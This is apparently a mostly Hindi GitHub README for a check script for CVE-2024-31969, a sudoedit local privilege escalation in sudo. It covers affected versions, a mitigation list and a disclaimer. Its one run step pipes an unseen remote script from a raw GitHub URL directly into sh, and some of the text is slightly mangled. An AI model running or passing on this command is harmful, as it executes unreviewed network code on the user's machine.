
CVE-2024-31969 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट जाँच स्क्रिप्ट और दस्तावेज़ प्रदान करता है, जो sudo के sudoedit में एक स्थानीय विशेषाधिकार वृद्धि है, जिसमें प्रभावित संस्करण और शमन मार्गदर्शन शामिल है।
CVE-2024-31969 sudo में sudoedit कमांड का उपयोग करते समय एक local privilege escalation भेद्यता है।
यह भेद्यता sudo 1.9.0 से शुरू हुई है, क्योंकि sudoedit उपयोगकर्ता के environment variable और फ़ाइल स्वामित्व को सही ढंग से मान्य नहीं करता है।
A flaw introduced in sudo 1.9.0 in how
sudoeditvalidated users' environment variables and file ownership.
यह भेद्यता sudoedit एक्सेस वाले स्थानीय उपयोगकर्ता को SUDO_EDITOR जैसे environment variable में हेरफेर करके, या symlink का लाभ उठाकर, root के रूप में arbitrary फ़ाइलों को संशोधित करने की अनुमति देती है।
| Sudo संस्करण | स्थिति |
|---|---|
| 1.9.0 → 1.9.15p4 | 🔥 असुरक्षित |
| 1.9.15p5 और उससे ऊपर | ✅ सुरक्षित |
| 1.8.x (1.8.23 सहित) | ❌ प्रभावित नहीं |
निम्नलिखित कमांड चलाएँ:
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh
sudo को 1.9.15p5 या उससे नए संस्करण में अपडेट करें।sudoedit की अनुमति देने वाले sudoers नियमों को सीमित करें।/etc/sudoers फ़ाइल में सुरक्षित env_keep या env_reset कॉन्फ़िगरेशन का उपयोग करें।यह रिपॉजिटरी शैक्षिक और सिस्टम सुरक्षा दस्तावेज़ीकरण उद्देश्यों के लिए बनाई गई है।
इस जानकारी का उपयोग अवैध गतिविधियों या सिस्टम स्वामी की लिखित अनुमति के बिना करना सख्त वर्जित है।
किसी भी प्रकार का दुरुपयोग पूरी तरह से निर्माता की जिम्मेदारी से बाहर है।